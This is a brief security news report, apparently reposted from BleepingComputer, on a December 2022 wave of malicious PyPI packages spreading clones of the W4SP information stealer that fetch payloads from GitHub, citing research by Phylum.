Security News > 2022 > December > Hackers bombard PyPi platform with information-stealing malware

The PyPi python package repository is being bombarded by a wave of information-stealing malware hiding inside malicious packages uploaded to the platform to steal software developers' data.

The malware dropped in this campaign is a clone of the open-source W4SP Stealer, responsible for a previous widespread malware infection on PyPI in November 2022.

An additional 31 packages dropping 'W4SP' have been removed from the PyPI repository, with the malware's operators continuing to seek new ways to reintroduce their malware on the platform.

Last week, the Phylum research team reported it had found another set of 47 packages that distributed W4SP on PyPI. However, this operation was disrupted after GitHub terminated the repository used by the threat actor for fetching the primary payload. The cybersecurity firm reported yesterday that at least 16 packages on PyPI are spreading ten different information-stealing malware variants based on W4SP Stealer.

Following the same tactics as with the W4SP operation, the new stealers use GitHub repositories as a remote resource for downloading the malware payload. It is unclear whether these malware "Clones" are operated by the same threat actors behind W4SP or its copycats, but Phylum hypothesizes it's from different groups that attempt to mimic previous campaigns.

Hackers have been increasingly targeting open-source package repositories as compromising developer's systems offers an opportunity for even larger attacks.

News URL

https://www.bleepingcomputer.com/news/security/hackers-bombard-pypi-platform-with-information-stealing-malware/